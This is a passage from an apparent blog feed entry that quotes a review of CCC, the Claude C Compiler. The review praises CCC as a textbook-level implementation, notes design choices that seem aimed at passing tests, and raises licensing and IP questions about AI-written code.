&lt;li&gt;AI coding is automation of implementation, so design and stewardship become more important.&lt;/li&gt;
&lt;li&gt;Manual rewrites and translation work are becoming AI-native tasks, automating a large category of engineering effort.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;Chris is generally impressed with CCC (the Claude C Compiler):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Taken together, CCC looks less like an experimental research compiler and more like a competent textbook implementation, the sort of system a strong undergraduate team might build early in a project before years of refinement. That alone is remarkable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It's a long way from being a production-ready compiler though:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Several design choices suggest optimization toward passing tests rather than building general abstractions like a human would. [...] These flaws are informative rather than surprising, suggesting that current AI systems excel at assembling known techniques and optimizing toward measurable success criteria, while struggling with the open-ended generalization required for production-quality systems.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The project also leads to deep open questions about how agentic engineering interacts with licensing and IP for both open source and proprietary code:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If AI systems trained on decades of publicly available code can reproduce familiar structures, patterns, and even specific implementations, where exactly is the boundary between learning and copying?&lt;/p&gt;
&lt;/blockquote&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/c"&gt;c&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/compilers"&gt;compilers&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;



</summary><category term="c"/><category term="compilers"/><category term="open-source"/><category term="ai"/><category term="ai-assisted-programming"/><category term="anthropic"/><category term="claude"/><category term="nicholas-carlini"/><category term="coding-agents"/><category term="agentic-engineering"/></entry></feed>